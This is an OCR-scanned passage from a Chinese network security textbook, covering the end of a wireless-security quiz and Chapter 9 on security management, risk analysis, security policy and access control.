A. BSS B. ESS C. SSID D. ND 
5. 关于 WIPS 下 面 错误 的 说 法 是 ( )。 
A. 一 个 典型 的 WIPS 由 探测 器 、 服 务 器 、 控 制 台 构成 
B. WIPS 的 主要 构成 部 件 都 处 于 私有 网 络 中 ， 与 互联 网 进行 隔离 
C. 在 远程 服务 器 WIPS 应 用 中 探测 器 在 私有 网 络 中 
D. WIPS 主要 包括 入 侵 侦 测 和 入 侵 防 御 功 能 
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二 、 操 作 题 


1. ”对 自己 家 里 的 无 线路 由 器 进行 SSID 隐藏 。 
2. 为 自己 家 里 的 无 线路 由 器 设置 防火 墙 、MAC 和 了 他 地址 过 滤 。 
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【项 目 要 点 】 


网 络 安全 管理 的 重要 意义 。 

网 络 安全 管理 策略 。 

网 络 安全 管理 实施 。 
信息 安全 管理 标准 。 
【学 习 目 标 】 

@ ”理解 网 络 安全 管理 的 重要 意义 。 


@ ”掌握 系统 风险 分 析 的 方法 。 
@ ”掌握 网 络 安全 管理 体系 建立 的 标准 和 方法 。 


9.1 网 络 安全 管理 的 意义 


随 着 网 络 规模 的 不 断 扩 大 ， 越 来 越 多 的 系统 加 入 到 其 中 由 于 各 个 系统 的 安全 性 及 管理 
方式 各 不 相同 ， 这 就 增加 了 网 络 安全 管理 的 复杂 度 和 难度 。 更 糟糕 的 是 ， 人 们 并 没有 清醒 
地 意识 到 网 络 安全 管理 的 重要 性 ， 目 前 大 多 数 信息 系统 缺少 安全 管理 员 ， 缺 少 安全 管理 技 
术 规 范 ， 缺 少 定期 的 系统 安全 测试 ， 缺 少 安全 审计 机 制 。 这 些 朴 于 管理 的 网 络 成 为 黑客 们 
的 游荡 乐园 。 

通常 安全 管理 涉及 两 个 方面 : 一 个 是 安全 管理 ， 即 防止 未 授权 者 访问 网 络 ， 另 一 个 是 
管理 的 安全 性 ， 即 防止 未 授权 者 访问 网 络 管理 系统 。 

网 络 安全 管理 方面 的 问题 主要 包括 : 网 络 管理 员 配置 不 当 或 网 络 应 用 升级 不 及 时 造成 
的 安全 漏洞 、 使 用 脆弱 的 用 户口 令 、 随 意 使 用 普通 网 络 站 点 下 载 的 软件 、 在 防火 墙 内 部 架 
设 拨号 服务 器 却 没 有 对 账号 的 认证 严格 限制 、 用 户 安全 意识 不 强 将 自己 的 账号 随意 转借 他 
人 或 与 别人 共享 等 。 

解决 网 络 安全 问题 ， 人 为 的 因素 是 不 可 忽视 的 。 多 数 的 安全 事件 是 由 于 人 员 玻 忽 或 者 
黑客 主动 攻击 、 植 入 恶意 程序 造成 的 。 人 员 的 疏忽 往往 是 造成 安全 漏洞 的 直接 原因 ， 因 此 
更 难以 防御 ， 危 害 性 也 更 大 。 

人 员 造 成 的 安全 问题 主要 有 3 个 方面 。 

(1) 网 络 和 系统 管理 员 对 系统 配置 及 安全 缺乏 清醒 的 认识 或 整体 的 考虑 ， 造 成 系统 
安全 性 差 。 

(2) 程序 员 开发 的 软件 有 安全 缺陷 ， 如 常见 的 缓冲 区 溢出 问题 。 

(3) 用 户 没有 保护 好 自己 的 口令 及 密 钥 。 

这 些 问题 都 会 使 网 络 处 于 危险 之 中 ， 而 且 是 无 论 多 么 精妙 的 安全 策略 和 网 络 安全 体系 
都 不 能 解决 的 。 


9.2 ”风险 分 析 与 安全 需求 
在 规划 和 建设 网 络 时 ， 应 把 网 络 安全 作为 建设 目标 之 一 ， 认 真 进行 分 析 与 规划 ， 对 可 
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能 面 对 的 网 络 安全 风险 、 网 络 安全 需求 、 应 达到 的 安全 级 别 等 制定 合理 的 安全 策略 ， 实 施 
必要 的 安全 措施 。 

实现 网 络 安全 并 不 是 一 劳 永 和 逸 ， 网 络 在 运行 过 程 中 受 许多 动态 因素 的 影响 ， 安 全 威胁 
也 是 不 断 发 生 和 变化 的 ， 这 决定 了 网 络 安全 的 管理 是 一 个 不 断 重复 的 过 程 。 在 此 过 程 中 ， 
要 经 常 对 网 络 的 安全 状况 进行 审计 和 评估 ， 改 变 不 合理 的 配置 ， 检 查 安全 漏洞 ， 增 加 新 的 
安全 措施 ， 抵 御 新 的 攻击 方式 ， 以 保证 网 络 的 正常 运行 。 

在 安全 领域 内 有 一 个 基本 的 原则 ， 那 就 是 防止 威胁 发 生 的 费用 一 定 要 小 于 威胁 发 生 后 
进行 补救 的 费用 ， 否 则 投资 就 是 不 经 济 、 不 合理 的 。 

制订 网 络 安全 策略 ， 以 确保 我 们 在 保障 安全 上 付出 的 努力 和 投资 会 得 到 应 有 的 收益 。 
道理 虽然 显而易见 ， 但 实施 起 来 却 并 不 容易 ， 常 会 出 现 的 情况 是 : 花 了 大 量 时 间 和 精力 ， 
耗费 了 大 笔 的 金钱 ， 制 定 和 实施 的 安全 措施 并 没有 起 到 预期 的 作用 。 因 而 在 构建 一 个 安全 
网 络 时 ， 首 先 要 做 的 就 是 对 系统 进行 准确 的 风险 分 析 ， 确 定 系统 的 安全 需求 ， 明 确 系统 哪 
些 部 分 容易 成 为 攻击 目标 等 。 

制订 一 个 安全 计划 ， 可 遵循 以 下 步骤 。 

(1) 确定 保护 什么 。 

(2) 考虑 防止 它 被 怎么 样 。 

(3) 威胁 发 生 的 可 能 性 。 

(4) 实施 最 经 济 有 效 的 保护 措施 。 

(5) 不 断 重复 以 上 过 程 ， 不 断 完善 安全 计划 。 

一 份 详尽 的 计划 书 ， 无 论 对 于 当前 安全 计划 的 实现 还 是 对 于 安全 系统 未 来 的 维护 都 是 
至 关 重 要 的 。 一 个 完整 的 安全 计划 书 应 包括 以 下 内 容 。 

(1) 总 则 : 说 明 系 统 设 计 的 总 体 思路 、 系 统 主要 完成 的 任务 及 主要 作用 等 。 

(2) 网 络 系统 状况 分 析 : 分 析 网 络 的 组 成 、 结 构 及 连接 状态 等 ， 如 基本 设备 情况 、 网 
络 划分 情况 、 与 Internet 连接 的 状况 ; 分析 网 络 的 服务 及 应 用 的 类 型 ， 分 析 网 络 的 
特点 。 

(3) 网 络 系统 安全 风险 分 析 : 从 网 络 的 物理 安全 性 、 网 络 平台 的 安全 性 、 系 统 的 安全 
性 、 应 用 安全 性 、 管 理 安全 性 等 几 个 方面 对 企业 局 域 网 络 可 能 面临 的 安全 风险 进行 分 析 。 

(4) 安全 需求 分 析 与 安全 策略 的 制定 : 描述 系统 的 安全 需求 与 安全 目标 ， 如 哪些 服务 
器 需要 安全 保护 、 哪 些 重要 网 段 需要 额外 的 保护 措施 、 哪 些 资源 需要 加 强 访问 控制 和 管理 
安全 等 。 通 过 分 析 ， 明 确 安 全 需求 和 安全 目标 ， 制 定 正确 严密 的 网 络 安全 策略 。 

(5) 网 络 安全 方案 总 体 设计 : 确定 网 络 系统 安全 方案 设计 、 规 划 时 应 遵循 的 原则 ， 确 
定安 全 方案 所 使 用 的 安全 机 制 及 安全 服务 。 

(6) 网 络 安全 体系 结构 设计 : 通过 对 网 络 的 全 面 了 解 ， 按 照 安 全 策略 的 要 求 、 风 险 
分 析 的 结果 及 整个 网 络 的 安全 目标 ， 设 计 和 建立 整个 网 络 的 安全 体系 。 具 体 的 安全 控制 
系统 由 几 个 方面 组 成 : 物理 安全 、 网 络 安全 、 系 统 安全 、 信 息 安全 、 应 用 安全 和 安全 
管理 。 

(7) 安全 系统 的 配置 及 实现 : 根据 以 上 的 分 析 和 设计 ， 选 择 适 当 的 安全 组 件 和 安全 
产品 ， 注 意 不 同 的 安全 组 件 之 间 功 能 的 协调 和 优势 的 互补 ， 形 成 一 个 完整 、 健 壮 的 安全 
体系 。 
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9.2.1 系统 风险 分 析 


风险 分 析 包 括 决 定 保护 什么 、 需 要 防止 什么 和 怎么 保护 ， 这 是 调查 风险 的 过 程 ， 随 后 
还 要 把 它们 按照 安全 的 级 别 排序 。 
风险 分 析 包 括 两 个 方面 : 确定 资产 和 确定 威胁 。 


1. 确定 资产 


风险 分 析 中 的 第 一 步 是 确定 所 有 需要 保护 的 东西 。 有 些 是 很 明显 的 ， 如 有 价值 的 私人 
信息 、 知 识 产权 和 各 种 各 样 的 硬件 设备 。 而 有 些 则 常 被 忽视 ， 如 真正 使 用 系统 的 人 。 根 据 
Pfleeger 建议 ， 可 以 使 用 一 个 种 类 列表 列 出 所 有 可 能 被 安全 问题 影响 的 东西 。 

(1) 硬件 : 计算 机 (服务 器 、 工 作 站 、 个 人 电脑 等 )、 打 印 机 、 存 储 设备 (磁盘 、 磁 带 
机 )、 通 信 线 路 、 终 端 服务 器 、 路 由 器 。 

(2) 软件 : 应 用 程序 、 诊 断 程序 、 操 作 系统 、 通 信 系 统 。 

(3) 数据 : 在 使 用 中 及 在 线 存储 的 文档 、 备 份 、 日 志 、 数 据 库 及 在 通信 媒体 中 传输 的 
数据 。 

(4) 人 : 用 户 、 管 理 员 、 软 硬件 维护 人 员 。 

(5) 文件 : 在 程序 、 硬 件 、 系 统 、 本 地 管理 中 使 用 的 文件 。 

(6) 物资 : 纸张 、 表 格 、 磁 介质 等 。 


2. 确定 威胁 


随 着 Internet 的 急剧 发 展 和 上 网 用 户 迅速 增加 ， 风 险 变 得 更 加 严重 和 复杂 。 

由 于 缺乏 安全 控制 机 制 和 对 Intemet 安全 政策 的 认识 不 足 ， 这 些 风险 正 日 益 严重 。 

网 络 安全 风险 可 以 从 以 下 两 个 方面 来 理解 : 一 是 系统 本 身 的 安全 风险 ， 如 网 络 的 物理 
安全 、 网 络 平台 的 安全 、 系 统 的 安全 、 应 用 的 安全 、 管 理 的 安全 。 二 是 来 自 系统 外 部 的 安 
全 风险 ， 如 黑客 、 恶 意 代码 。 其 中 外 部 的 安全 风险 是 通过 在 系统 本 身 的 安全 风险 中 找到 突 
破 口 而 发 生 的 。 下 面 将 从 这 些 方面 具体 分 析 网 络 可 能 面临 的 安全 风险 。 

(1) 物理 安全 风险 。 网 络 的 物理 安全 风险 是 多 种 多 样 的 。 网 络 的 物理 安全 主要 是 地 
震 、 水 灾 、 火 灾 等 环境 事故 ， 电 源 故障 ， 人 为 操作 的 失误 或 错误 ， 设 备 被 盗 、 被 毁 ;， 电 磁 
干扰 ;线路 截获 ， 硬 件 、 机 房 环 境 及 报警 系统 的 设计 ， 安 全 意识 等 。 它 是 整个 网 络 系统 安 
全 的 前 提 。 

(2) 网 络 平台 的 安全 风险 。 网 络 结构 的 安全 涉及 网 络 拓扑 结构 、 网 络 路 由 状况 及 网 络 
的 环境 等 。 

(3) 系统 的 安全 风险 。 系 统 的 安全 是 指 网 络 操作 系统 、 网 络 硬件 平台 是 否 可 靠 和 值得 
信任 。 无 论 是 Microsoft 的 Windows NT 或 者 其 他 任何 商用 UNIX 操作 系统 ， 其 开发 厂商 很 
可 能 留 有 “后 门 ”， 并 且 安 全 漏洞 也 不 断 被 发 现 。 虽 然 说 没有 绝对 安全 的 操作 系统 ， 但 是 ， 
可 以 通过 对 现 有 的 操作 平台 进行 安全 配置 、 对 操作 和 访问 权限 进行 严格 控制 ， 加 强 登录 过 程 
的 认证 (特别 是 在 到 达 服 务 器 主机 之 前 的 认证 )， 确 保 用 户 的 合法 性 ， 提 高 系统 的 安全 性 。 

(4) 应 用 的 安全 风险 。 应 用 系统 的 安全 跟 具 体 的 应 用 有 关 ， 它 涉及 很 多 方面 。 应 用 系 
统 是 不 断 发 展 的 ， 且 应 用 类 型 是 不 断 增加 的 ， 其 安全 漏洞 也 是 不 断 增 加 且 隐 藏 得 越 来 越 
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深 。 因此， 一 套 详尽 的 测试 软件 是 必需 的 。 应 用 的 安全 性 涉及 信息 、 数 据 的 安全 性 ， 如 机 
密 信息 泄露 、 未 经 授权 的 访问 、 破 坏 信息 完整 性 、 假 冒 、 破 坏 系 统 的 可 用 性 等 。 应 用 系 
统 的 安全 是 动态 的 、 不 断 变化 的 。 保 证 应 用 系统 的 安全 也 是 一 个 随 网 络 发 展 不 断 完善 的 
过 程 。 

(5) 管理 的 安全 风险 。 管 理 是 网 络 安全 中 最 重要 的 部 分 。 责 权 不 明 、 管 理 混乱 、 安 全 
管理 制度 不 健全 及 缺乏 可 操作 性 等 都 可 能 引起 管理 安全 的 风险 。 当 网 络 出 现 攻击 行为 或 网 
络 受到 其 他 一 些 安全 威胁 (如 内 部 人 员 的 违规 操作 等 ) 时 ， 无 法 进行 实时 的 检测 、 监 控 、 报 
告 与 预警 。 这 就 要 求 必 须 对 站 点 的 访问 活动 进行 多 层次 的 记录 ， 及 时 发 现 非法 入 侵 行为 。 
建立 全 机 制 ， 必 须 深刻 理解 网 络 并 提供 直接 的 解决 方案 。 

(6) 黑客 攻击 。 黑 客 会 利用 系统 和 管理 上 的 一 切 可 能 利用 的 漏洞 。 我 们 可 以 综合 采用 
防火 墙 技术 、Web 页 面 保护 技术 、 入 侵 检测 技术 、 安 全 评估 技术 来 保护 网 络 内 的 信息 资 
源 ， 防 止 黑客 攻击 。 

(7) 恶意 代码 。 计 算 机 病毒 是 一 种 典型 的 恶意 代码 ， 它 一 直 是 计算 机 安全 的 主要 威 
胁 。 亚 意 代码 不 限于 病毒 ， 还 包括 蠕虫 、 特 洛 伊 森马、 逻辑 炸弹 和 其 他 未 经 许可 的 软件 。 

(8) 不 满 的 内 部 员工 。 与 外 来 的 入 侵 者 相 比 ， 他 们 更 熟悉 服务 器 、 小 程序 、 脚 本 和 系 
统 的 弱点 。 对 于 已 经 离职 的 不 满员 工 ， 他 们 可 以 传 出 至 关 重 要 的 信息 、 泄 露 安全 信息 、 错 
误 地 进入 数据 库 、 删 除数 据 等 。 可 以 通过 定期 改变 口令 和 删除 系统 记录 以 减少 这 类 风险 。 


9.2.2 ”网 络 的 安全 需求 


对 于 一 般 的 网 络 ， 主 要 的 安全 需求 集中 在 对 服务 器 的 安全 保护 、 防 黑客 和 病毒 、 重 要 
网 段 的 保护 以 及 管理 安全 上 。 因 此 ， 必 须 采取 相应 的 安全 措施 杜绝 安全 隐患 ， 其 中 应 该 做 到 ; 

(1) 公开 服务 器 的 安全 保护 。 

(2) 防止 黑客 从 外 部 攻击 。 

(3) 入 侵 检测 与 监控 。 

(4) 信息 审计 与 记录 。 

(5) 病毒 防护 。 

(6) 数据 安全 保护 。 

(7) 数据 备份 与 恢复 。 

(8) 网 络 的 安全 管理 。 


9.3 ”安全 管理 策略 


安全 管理 涉及 两 方面 : 一 是 安全 管理 ， 即 防止 未 授权 访问 网 络 ， 另 一 个 是 管理 的 安全 
即 防止 未 授权 者 访问 网 络 管理 系统 。 

安全 策略 是 整个 安全 系统 的 基石 ， 它 定义 了 网 络 运作 和 管理 的 基本 规则 ， 是 网 络 系 
统 、 应 用 软件 、 员 工 甚 至 是 访问 者 都 能 遵循 的 一 整套 协议 。 安 全 策略 的 制定 是 一 项 巨大 的 
工程 ， 对 于 许多 的 技术 细节 及 一 切 可 能 发 生 的 情况 都 要 考虑 和 处 理 。 但 只 要 对 网 络 做 好 风 
险 分 析 和 评估 ， 对 安全 现状 和 安全 技术 有 足够 的 了 解 ， 制 定 的 安全 策略 将 是 一 个 回报 率 很 
高 的 工作 。 
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安全 策略 是 一 个 “ 活 文档 ”， 随 着 新 教训 的 获得 和 企业 的 不 断 发 展 ， 安 全 策略 应 该 被 
不 断 地 校正 和 修改 。 安 全 策略 又 是 配置 安全 工具 的 指南 ， 一 些 技术 工具 ， 如 : 防火 墙 、 入 
侵 检测 系统 的 建立 、 实 现 和 配置 方案 ， 都 应 该 体现 安全 策略 ， 它 们 只 需 简单 地 执行 策略 确 
立 的 规则 并 禁止 被 策略 视 为 不 合适 的 行为 即 可 。 安 全 策略 是 建立 有 效 的 安全 防护 体系 的 方 
法 ， 也 为 网 络 用 户 深入 地 理解 和 使 用 系统 安全 功能 提供 了 有 益 的 帮助 ， 确 保 系统 的 安全 性 
及 可 用 性 达到 设计 的 预期 目标 。 

在 网 络 规划 和 设计 之 初 就 进行 安全 策略 的 制定 是 十 分 必要 的 。 安 全 策略 建立 起 来 以 
后 ， 可 以 对 网 络 的 拓扑 结构 、 子 网 划分 、 传 输 介质 选择 、 系 统 及 应 用 软件 的 选择 、 信 息 资 
源 如 何 部 署 、 应 用 程序 开发 等 提供 准则 ， 从 而 使 系统 的 安全 性 从 整体 上 得 到 提升 。 

安全 政策 规定 做 什么 (Whab， 而 不 规定 如 何 去 做 (How)， 因 此 它 不 是 一 个 操作 规范 。 


9.3.1 制定 安全 策略 的 原则 


1. 安全 策略 设计 的 依据 


设计 网 络 安全 系统 的 一 个 首要 任务 就 是 确认 该 网 络 的 安全 需求 和 目标 ， 并 制定 安全 
策略 。 

安全 策略 应 该 反映 本 地 网 络 同 外 部 网 络 连接 的 理由 ， 并 规定 网 络 对 内 部 用 户 及 外 部 用 
户 分 别提 供 哪些 服务 ， 哪 些 服务 是 完全 开放 的 ， 哪 些 服 务 需 要 设置 访问 限制 等 。 制 定安 全 
策略 时 ， 首 先 要 明确 最 重要 的 原则 是 采用 “准许 访问 除 明 确 禁 止 以 外 的 所 有 服务 ”， 还 是 
采纳 “禁止 访问 除 明 确 准许 以 外 的 所 有 服务 ”。 这 对 于 网 络 安全 策略 是 非常 关键 的 一 步 ， 
但 往往 又 容易 被 忽视 。 这 两 个 原则 的 区 别 在 于 : 前 者 对 大 部 分 服务 不 做 控制 ， 可 能 会 有 危 
害 安全 的 应 用 服务 被 启用 ， 除 非 管理 员 发 现 问题 并 明确 禁止 ， 此 原则 引发 的 安全 问题 较 突 
出 。 后 者 由 于 拒绝 除 明确 准许 以 外 的 所 有 服务 ， 在 没有 得 到 管理 员 鉴定 准许 之 前 ， 新 的 服 
务 无 法 被 用 户 使 用 ， 灵 活性 稍 差 。 

选择 什么 原则 ， 取 决 于 网 络 安全 性 能 及 服务 性 能 的 要 求 。 

在 做 出 基本 的 决策 之 后 ， 进 一 步 要 做 的 是 决定 哪些 服务 向 内 部 用 户 提供 ， 哪 些 服务 向 
外 部 的 网 络 用 户 提供 。 如 企业 的 WWW 服务 器 ， 负 责 企业 的 信息 发 布 和 展示 企业 形象 ， 是 
企业 对 外 的 窗口 ， 是 典型 的 提供 给 外 部 网 络 用 户 的 服务 。 企 业内 部 资源 服务 器 ， 如 各 种 管 
理 系 统 (供应 链 管理 、 生 产 管 理 、 工 资 人 事 管理 ) 等 ， 则 只 向 内 部 用 户 提供 服务 。 另 外 ， 在 
安全 策略 中 ， 还 应 包括 监控 安全 的 方式 和 实施 安全 策略 的 方式 的 说 明 。 

在 设计 安全 策略 和 选择 网 络 安全 系统 时 ， 一 个 总 的 原则 是 : 设计 简单 有 效 的 系统 。 因 
为 安全 系统 越 复杂 ， 越 不 容易 进行 正确 的 配置 ， 维 护 就 越 困 难 ， 从 而 引发 安全 问题 ; 并 
且 ， 受 到 攻击 时 ， 越 容易 受到 破坏 。 另 外 ， 过 于 复杂 的 安全 系统 ， 也 会 影响 网 络 的 使 用 性 
能 ， 降 低 对 用 户 请 求 的 响应 速度 等 。 

在 设计 网 络 安全 系统 时 ， 还 需要 考虑 用 户 使 用 安全 系统 的 便利 ， 尽 量 提高 安全 系统 的 
透明 性 ， 尽 可 能 减少 由 于 增加 安全 措施 而 给 用 户 带 来 的 不 便 。 用 户 接纳 和 满意 对 于 安全 系 
统 的 良好 运作 和 维护 是 至 关 重 要 的 。 

综 上 所 述 ， 在 制订 网 络 安全 策略 时 应 考虑 以 下 因素 : 

@ ”对 于 内 部 用 户 和 外 部 用 户 分 别提 供 哪 些 服务 。 

@ ”初始 投资 及 后 续 投资 。 
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@ ”使 用 的 方便 性 和 服务 效率 。 
@ 复杂 度 和 安全 性 的 平衡 。 
@ 网络 性 能 。 


2. 安全 策略 建立 


制定 安全 策略 的 过 程 就 是 在 系统 风险 分 析 及 安全 需求 分 析 之 后 ， 针 对 系统 可 以 遇 到 的 
威胁 ， 确 定 系统 的 安全 防御 体系 “做 什么 ”过 程 。 例 如 : 针对 系统 可 能 遇 到 入 侵 行为 ， 安 
全 策略 可 以 是 : “7x24 小 时 对 网 络 进行 监测 以 防止 入 侵 行为 ”， 这 就 是 确定 系统 需要 “做 
什么 ”。 在 制定 策略 的 过 程 中 ， 最 好 不 指定 解决 方案 ， 如 果 策 略 中 规定 选用 某 公 司 的 菜 
型 入 侵 检 测 产 品 ， 就 使 策略 的 实施 缺少 了 弹性 ， 因 为 技术 发 展 非常 快 ， 今 天 的 技术 不 可 能 
一 直 是 好 的 解决 方案 。 更 好 的 说 法 应 该 是 : “防止 未 授权 信息 进入 网 络 ”。 如 果 需 要 为 策 
略 提供 本 质 的 内 容 ， 再 用 详细 的 注释 把 该 策略 的 目的 和 意图 解释 给 具体 实现 策略 的 人 。 

制定 安全 策略 应 该 尽 可 能 简洁 一 些 ， 但 由 于 安全 策略 必须 覆盖 所 有 相关 的 主题 ， 它 又 
不 可 避免 地 较 长 。 作 为 折 中 的 办 法 ， 可 以 根据 安全 策略 针对 的 不 同 职责 范围 划分 层次 ， 如 
系统 管理 员 需 要 实施 的 安全 策略 、 数 据 库 管理 员 需 要 实施 的 安全 策略 、 安 全 管理 员 需 要 实 
施 的 安全 策略 、 普 通用 户 要 实施 的 安全 策略 等 。 这 样 一 来 ， 用 户 就 可 以 直接 找 与 自己 相关 
的 内 容 去 学 习 和 实施 安全 策略 。 另 外 ， 安 全 策略 必须 是 实际 环境 中 可 行 和 可 实现 的 ， 应 该 
充分 考虑 了 员工 和 管理 人 员 的 意见 。 也 可 由 专门 的 安全 公司 来 制定 安全 策略 或 获得 咨询 服 
务 ， 这 些 专业 的 安全 公司 有 助 于 更 好 、 更 全 面 地 理解 和 制定 安全 策略 。 制 定安 全 策略 的 流 


程 如 图 9-1 所 示 。 
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9-1 制定 安全 策略 流程 图 
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9.3.2 ”安全 策略 内 容 


安全 策略 是 指 在 某 个 安全 区 域内 ， 所 有 与 安全 活动 相关 的 一 套 规则 。 如 果 把 构建 网 络 
安全 的 目标 比 作 一 座 大 厦 ， 那 么 相应 的 安全 策略 就 是 施工 的 蓝图 ， 它 使 网 络 建设 和 管理 过 
程 中 的 安全 工作 避免 了 盲目 性 。 

调查 显示 ， 目 前 55% 的 企业 网 没有 自己 的 安全 策略 ， 仅 靠 一 些 简 单 的 安全 措施 来 保障 
网 络 安全 。 这 些 安全 措施 可 能 存在 互相 分 立 、 互 相 矛 盾 、 互 相 重复 、 各 自 为 战 等 问题 ， 既 
无 法 保障 网 络 的 安全 可 靠 ， 又 影响 网 络 的 服务 性 能 ， 并 且 随 着 网 络 运行 而 对 安全 措施 进行 
不 断 的 修补 ， 使 整个 安全 系统 愈加 腾 肿 不 堪 ， 导 致 难以 使 用 和 维护 。 

网 络 安全 策略 包括 对 企业 的 各 种 网 络 服务 的 安全 层次 和 用 户 的 权限 进行 分 类 ， 确 定 管 
理 员 的 安全 职责 ， 以 及 如 何 实施 安全 故障 处 理 、 网 络 拓扑 结构 、 入 侵 及 攻击 的 防御 和 检 
测 、 备 份 和 灾难 恢复 等 内 容 。 在 本 书 中 所 说 的 安全 策略 主要 指 系统 安全 策略 ， 主 要 涉及 3 
个 大 的 方面 : 物理 安全 策略 、 访 问 控制 策略 、 信 息 加 密 策略 。 


1. 物理 安全 策略 


制定 物理 安全 策略 的 目的 是 保护 路 由 器 、 交 换 机 、 工 作 站 、 各 种 网 络 服务 器 、 打 印 机 
等 硬件 实体 和 通信 和 链 路 免 受 自然 灾害 、 人 为 破坏 和 搭 线 窃听 攻击 ;验证 用 户 的 身份 和 使 用 
权限 ， 防 止 用 户 越权 操作 ; 确保 网 络 设备 有 一 个 良好 的 电磁 兼容 工作 环境 ， 建 立 完备 的 机 
房 安全 管理 制度 ， 妥 善 保管 备份 磁带 和 文档 资料 ， 防 止 非法 人 员 进 入 机 房 进行 偷窃 和 破坏 
活动 。 

2， 访问 控制 策略 


访问 控制 是 网 络 安全 防范 和 保护 的 主要 策略 ， 它 的 主要 任务 是 保证 网 络 资源 不 被 非法 
使 用 和 访问 ， 它 也 是 维护 网 络 系统 安全 、 保 护 网 络 资源 的 重要 手段 。 各 种 安全 策略 必须 相 
互 配合 才能 真正 起 到 保护 作用 ， 而 访问 控制 可 以 说 是 保证 网 络 安全 最 重要 的 核心 策略 之 
一 。 下 面 来 分 述 各 种 访问 控制 策略 。 

(1) 入 网 访问 控制 : 入 网 访问 控制 为 网 络 访问 提供 了 第 一 层 访问 控制 。 它 控制 哪些 用 
户 能 够 登录 到 服务 器 并 获取 网 络 资源 ， 控 制 准许 用 户 入 网 的 时 间 和 准许 在 哪 台 工作 站 入 
网 。 用 户 的 入 网 访问 控制 可 分 为 3 个 步骤 : 用 户 名 的 识别 与 验证 、 用 户口 令 的 识别 与 验 
证 、 用 户 账号 的 默认 限制 检查 。 三 道 关 卡 中 只 要 任何 一 关 未 过 ， 该 用 户 便 不 能 进入 该 网 络 。 

对 网 络 用 户 的 用 户 名 和 口令 进行 验证 是 防止 非法 访问 的 第 一 道 防线 。 用 户 注册 时 首先 
输入 用 户 名 和 口令 ， 服 务 器 将 验证 所 输入 的 用 户 名 是 否 合法 。 如 果 验 证 合法 ， 才 继续 验证 
用 户 输入 的 口令 ， 和 否则 用 户 将 被 拒 之 于 网 络 之 外 。 用 户 的 口令 是 用 户 入 网 的 关键 所 在 。 为 
保证 口令 的 安全 性 ， 用 户口 令 不 能 显示 在 显示 屏 上 ， 口 令 长 度 应 不 少 于 6 个 字符 ， 口 令 字 
符 最 好 是 数字 、 字 母 和 其 他 字符 的 混合 ， 用 户口 令 必须 经 过 加 密 。 经 过 加 密 的 口令 ， 即 使 
是 系统 管理 员 也 难以 得 到 它 。 用 户 还 可 采用 一 次 性 用 户口 令 ， 也 可 用 便携 式 验证 器 (如 智能 
卡 ) 来 验证 用 户 的 身份 。 

网 络 管理 员 应 该 可 以 控制 和 限制 普通 用 户 的 账号 使 用 、 访 问 网 络 的 时 间 、 方 式 。 用 户 
名 或 用 户 账号 是 所 有 计算 机 系统 中 最 基本 的 安全 形式 ， 用 户 账号 应 只 有 系统 管理 员 才能 建 


.1550\. 


第 9 章 风 络 安 全 管理 全 


立 。 用 户口 令 应 是 每 个 用 户 访问 网 络 所 必须 提交 的 “证 件 ”， 用 户 可 以 修改 自己 的 口令 ， 
但 系统 管理 员 应 该 可 以 控制 口令 的 以 下 几 个 方面 的 限制 : 最 小 口令 长 度 、 强 制 修改 口令 的 
时 间 间 隔 、 口 令 的 唯一 性 、 口 令 过 期 失效 后 允许 入 网 的 宽 限 次 数 。 

用 户 名 和 口令 验证 有 效 之 后 ， 再 进一步 执行 用 户 账号 的 默认 限制 检查 。 网 络 应 能 控制 
用 户 登 录入 网 的 站 点 、 限 制 用 户 入 网 的 时 间 、 限 制 用 户 入 网 的 工作 站 数量 。 当 用 户 对 交 费 
网 络 的 访问 “资费 ”用 尽 时 ， 网 络 还 应 能 对 用 户 的 账号 加 以 限制 。 网 络 应 对 所 有 用 户 的 访 
问 进行 审计 。 如 果 多 次 输入 口令 不 正确 ， 则 认为 是 非法 用 户 的 入 侵 ， 应 给 出 报警 信息 。 

(2) 网 络 的 权限 控制 : 网 络 的 权限 控制 是 针对 网 络 非法 操作 所 提出 的 一 种 安全 保护 措 
施 。 用 户 和 用 户 组 被 赋予 一 定 的 权限 。 网 络 控制 用 户 和 用 户 组 可 以 访问 哪些 目录 、 子 目 
录 、 文 件 和 其 他 资源 ， 可 以 指定 用 户 对 这 些 文件 、 目 录 、 设 备 能 够 执行 哪些 操作 。 可 以 根 
据 访 问 权 限 将 用 户 分 为 以 下 几 类 : 特殊 用 户 ( 即 系统 管理 员 )， 一般 用 户 ， 系 统管 理 员 根据 
他 们 的 实际 需要 为 他 们 分 配 操作 权限 ; 审计 用 户 ， 负 责 网 络 的 安全 控制 与 资源 使 用 情况 的 
审计 。 用 户 对 网 络 资源 的 访问 权限 可 以 用 一 个 访问 控制 表 来 描述 。 

(3) 目录 级 安全 控制 : 网 络 应 能 够 控制 用 户 对 目录 、 文 件 、 设 备 的 访问 。 用 户 在 目录 
一 级 指定 的 权限 对 所 有 文件 和 子 目 录 有 效 ， 用 户 还 可 进一步 指定 对 目录 下 的 子 目 录 和 文件 
的 权限 。 对 目录 和 文件 的 访问 权限 一 般 有 8 种 : 系统 管理 员 权 限 (Supervisor)、 读 权限 
(Read)、 写 权限 (Write)、 创 建 权限 (Create)、 删 除权 限 (Erase)、 修 改 权 限 (Modify)、 文 件 查 
找 权限 (File Scan)、 存 取 控 制 权限 (Access Control)。 一 个 网 络 系统 管理 员 应 当 为 用 户 指定 适 
当 的 访问 权限 ， 这 些 访问 权限 限制 着 用 户 对 服务 器 的 访问 。8 种 访问 权限 的 有 效 组 合 可 以 
让 用 户 有 效 地 完成 工作 ， 同 时 又 能 有 效 地 控制 用 户 对 服务 器 资源 的 访问 ， 从 而 加 强 了 网 络 
和 服务 器 的 安全 性 。 

(4) 属性 安全 控制 ， 当 使 用 文件 、 目 录 和 网 络 设备 时 ， 网 络 系统 管理 员 应 给 文件 、 目 
录 等 指定 访问 属性 。 属 性 安全 控制 可 以 将 给 定 的 属性 与 网 络 服务 器 的 文件 、 目 录 和 网 络 设 
备 联系 起 来 。 属 性 安全 在 权限 安全 的 基础 上 提供 更 进一步 的 安全 性 。 网 络 上 的 资源 都 应 预 
先 标 出 一 组 安全 属性 。 属 性 往往 能 控制 以 下 几 个 方面 的 权限 : 向 某 个 文件 写 数据 、 复 制 一 
个 文件 、 删 除 目录 或 文件 、 查 看 目录 和 文件 、 执 行文 件 、 隐 藏 文件 、 共 享 文件 、 修 改 系统 
属性 等 。 网 络 的 属性 可 以 保护 重要 的 目录 和 文件 ， 防 止 用 户 对 目录 和 文件 的 误 删除 、 执 
行 、 修 改 、 显 示 等 。 

(5) 网 络 服务 器 安全 控制 :网 络 允许 在 服务 器 控制 台 上 执行 一 系列 操作 。 用 户 使 用 控 
